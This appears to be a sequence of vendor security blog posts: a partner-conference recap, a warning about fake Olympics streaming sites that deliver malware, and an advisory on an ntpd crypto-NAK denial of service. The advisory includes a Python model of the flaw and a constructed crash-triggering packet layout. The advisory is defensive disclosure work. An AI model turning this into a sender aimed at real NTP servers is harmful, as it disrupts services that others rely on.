Last week, SonicWall hosted more than 230 enthusiastic partners at our EMEA PEAK16 event, and the information exchange was a valuable one for all of us. The city of Valletta in Malta, whose ancient stone walls and fortresses have provided defense against attacks throughout history, proved an appropriate location for a security conference. The feedback we received from partners reaffirmed that as threats continue to evolve, customers need to stay at least one step ahead of them. We heard a clear need to let IT move from being an obstacle to the business to being an enabler, with technologies that protect against threats but still provide easy access for all workers, especially those who are mobile or remote.

EMEA PEAK16 reinforced for us that it’s more important than ever to provide a security portfolio that helps our partners strengthen their roles as trusted advisors. Partners took advantage of business and technical sessions designed to give them insight into the cyber threat landscape and how the Security portfolio delivers real solutions to today’s threats.

EMEA PEAK16 wrapped up with the recognition of those partners who exemplify commitment to the SonicWall portfolio and achieved substantial sales growth over the last year. The awards highlighted partner excellence in Distribution, Channel Partners, New Partners and the coveted Project of the Year. Congratulations to the following winners:

  • 2015 SonicWall EMEA Best Distributor –Exertis
  • 2015 SonicWall EMEA Best Performing Partner –NetThreat
  • 2015 SonicWall EMEA Best New Comer –Ineo IT Solutions
  • 2015 SonicWall EMEA Special Jury Award –Data-Sec
  • 2015 SonicWall EMEA Project of the Year – Nalta Consultancy

EMEA PEAK16 was a great reminder of the commitment to mutual success we share with our Security partners, and of the importance of our mission to protect our mutual customers from today’s ever-evolving threats. Events like EMEA PEAK16, with their opportunities for networking alongside educational sessions and new product information, are key to our partner-dependent go-to-market strategy. I think the words of our partners sum it up best:

PEAK16 in Malta

“For me it was one of the best EMEA PEAKs of the past years – great news, networking, direct contact in order to give feedback and get hot information directly from product-management, engineering, executives and had a lot of FUN! “Work hard – Party hard” and Business is made by people – that is one of the secrets to success!” said Nicolai Landzettel, CEO, Data-Sec UG

All of the sessions were interactive where we received strong, positive feedback on the progress of our portfolio and programs and validated the investments we are making to improve partner profitability, expand our sales and technical enablement offerings and build out our partner tools and infrastructure. Each of these elements are being optimized to better align with customer needs and partner engagement models. At EMEA PEAK16, we announced:

  • Enhancements to our Deal Registration program to make it more inclusive of SMB opportunities to reward partners who originate new customers and opportunities
  • Our partner Reward for Value framework which provides incremental discounts now available to partners with technical capabilities who deliver a proof of concept to their customers
  • New strategies for sustained partner sales and technical enablement including expanded curriculum and delivery options
  • A new sales accreditation program recently rolled out to the Security sales teams is now available to all Security Solutions Partners in July 2016. Designed to help continue driving the momentum behind the 30% increase in SonicWall certified Network Security partners over the last year, the program covers the full SonicWall portfolio and includes online learning, tools, training and accreditation.

We look forward to a continued strong year with our EMEA partners as we drive further advancements and enhancements in our portfolio and products and fulfill our mission to protect our mutual customers.

Zika Is Not the Only Virus You Can Get By Watching the Olympics

It’s August 5, 2016 and you settle down at your computer to watch the Olympic opening ceremony. You have no fear of catching Zika, unlike the thousands of people in Rio. Feeling safe, you navigate to the official broadcast site of the games and click on Watch the Olympics live.

But wait, there’s fine print: Simply sign in using your TV provider account login and password and you’ll have access to FREE, LIVE Rio Olympics coverage. Not cool. “Who pays for TV?” you ask yourself. “Haven’t they heard of streaming?” So you search for “Olympics live streaming free” and there, on the first page of results, is:

The site doesn’t look official, but hey, the media player icon looks like YouTube, which you know is safe, so you click Play. The site asks you to download and install a video codec. The ceremony starts in five minutes and the screen screams “Stream in HD now!” You’re one step away from the free live stream, so you click Accept... and within seconds your computer is infected. Perhaps the video will start, perhaps it won’t, but either way the malware now on your computer will give you greater problems than missing the opening ceremony.

How can you protect yourself from such a scenario? Here are some precautions you can take:

  1. Don’t go there. If a website is not an official site, chances are that it does not have the right to stream protected content. And if it does not have rights to stream, then the content is just bait for unsuspecting visitors like you.
  2. Don’t click that. So you ended up on the site anyhow. If it asks you to click a link or icon, tempts you with ads for free stuff, wants to do a download, or wants to install something, the only thing you should click is Close, as in close the browser.
  3. Update, update, update. Whether you are using a PC or a mobile device, update your operating system with the latest hotfixes. Update your browser to the latest level. Update your anti-virus software with the latest signatures. Configure your applications to do all these things automatically.
  4. Control and protect your network with a next-generation firewall. A next-generation firewall includes up-to-date security services that block websites of ill repute, prevent malicious downloads and stop the latest malware. It also denies intrusion and attack attempts, snuffs out botnet traffic patterns, and recognizes which countries have the riskiest and most suspect Internet activity. You can’t get this level of security simply by following the first three precautions.

To learn more about the bad things that can infect you on the Internet and the ways that you can inoculate yourself, read our ebook – How ransomware can hold your business hostage.


NTP crypto-NAK DoS

ntpd is an implementation of the Network Time Protocol (NTP). It sets and maintains the system time of day in synchronization with Internet standard time servers or local reference clocks. Many servers and network devices ship with ntpd built in.

NTP supports several association modes: client/server, symmetric and broadcast. Symmetric mode is used for time synchronization between servers, with authentication, and comes in two variants, active and passive. A symmetric-active packet is sent by a host that has a configured association with its peer. When a symmetric-active packet arrives from a source with no configured association, the receiver mobilizes a short-lived symmetric-passive association so that the two can authenticate. When a packet fails authentication, ntpd responds with a crypto-NAK: an NTP packet whose MAC field is only four bytes long and contains key ID zero.

While processing an incoming packet, findpeer() is called to look up an existing association for the source. It returns a pointer to the peer structure, or NULL when no association exists. To decide whether the packet is a crypto-NAK, valid_NAK() is called with that pointer as one of its parameters. valid_NAK() reads the keyid and flags fields of the peer structure without first checking the pointer for NULL, which causes a NULL pointer dereference whenever the crypto-NAK comes from a source that has no association.

A remote attacker can send an unsolicited crypto-NAK packet, for which findpeer() finds no association, to trigger this dereference and crash ntpd, resulting in a denial of service. Time synchronization then stops until ntpd is restarted, so affected hosts should move to an ntpd release that includes the fix (ntpd --version shows the running release).
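The receive path described above, modelled in Python as an added example (this is not ntpd’s code): is_crypto_nak() recognises the packet by its wire shape, findpeer() may return None where ntpd returns NULL, and valid_nak_vulnerable() and valid_nak_fixed() differ only in the missing check. The 48-byte header plus 4-byte key ID of zero is ntpd’s definition of a crypto-NAK; the Peer fields, the FLAG_AUTHENABLE value and the peer table are assumptions made for the model, and the sample packet is constructed.

```python
"""Model of ntpd's crypto-NAK handling and the missing NULL-peer check.
Added example; not ntpd's code. Peer fields and flag values are assumed."""

LEN_PKT_NOMAC = 48          # NTP header length without a MAC
FLAG_AUTHENABLE = 0x0002    # assumed flag value for the model

class Peer:
    """Stand-in for ntpd's struct peer (only the fields valid_NAK reads)."""
    def __init__(self, addr: str, keyid: int, flags: int):
        self.addr, self.keyid, self.flags = addr, keyid, flags

def is_crypto_nak(packet: bytes) -> bool:
    """True when the MAC field is exactly 4 bytes and holds key ID 0."""
    return len(packet) == LEN_PKT_NOMAC + 4 and packet[LEN_PKT_NOMAC:] == b"\x00\x00\x00\x00"

def findpeer(peers: dict, addr: str):
    """Look up an existing association; returns the Peer or None (ntpd: NULL)."""
    return peers.get(addr)

def valid_nak_vulnerable(peer, packet: bytes) -> bool:
    # Dereferences peer unconditionally: a crypto-NAK from an unknown source
    # arrives with peer None and raises AttributeError, the analogue of the crash.
    if not is_crypto_nak(packet):
        return False
    return peer.keyid != 0 and bool(peer.flags & FLAG_AUTHENABLE)

def valid_nak_fixed(peer, packet: bytes) -> bool:
    if not is_crypto_nak(packet):
        return False
    if peer is None:            # the check that was missing
        return False
    return peer.keyid != 0 and bool(peer.flags & FLAG_AUTHENABLE)

def receive(peers: dict, src: str, packet: bytes, valid_nak=valid_nak_fixed) -> str:
    """What the daemon does with the packet: 'drop', 'crypto-nak' or 'process'."""
    peer = findpeer(peers, src)
    if is_crypto_nak(packet):
        return "crypto-nak" if valid_nak(peer, packet) else "drop"
    return "process"

# Constructed sample: LI=0, VN=4, mode=1 (symmetric active), zero body, 4-byte MAC of key ID 0.
SAMPLE_NAK = bytes([0x21]) + b"\x00" * 47 + b"\x00" * 4
SAMPLE_PEERS = {"192.0.2.1": Peer("192.0.2.1", keyid=5, flags=FLAG_AUTHENABLE)}

if __name__ == "__main__":
    print(receive(SAMPLE_PEERS, "192.0.2.1", SAMPLE_NAK))      # known peer: crypto-nak
    print(receive(SAMPLE_PEERS, "198.51.100.7", SAMPLE_NAK))   # unknown source: drop
    try:
        receive(SAMPLE_PEERS, "198.51.100.7", SAMPLE_NAK, valid_nak=valid_nak_vulnerable)
    except AttributeError as e:
        print("vulnerable path crashed:", e)
```

Note that a packet with a 20-byte MD5 MAC or a 24-byte SHA-1 MAC is not a crypto-NAK even if its key ID is zero; only the 4-byte form triggers this path.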

Dell SonicWALL has researched this vulnerability and created the following signature to protect our customers:

  • IPS: 11240 NTP Daemon Crypto-NAK Authentication Bypass 1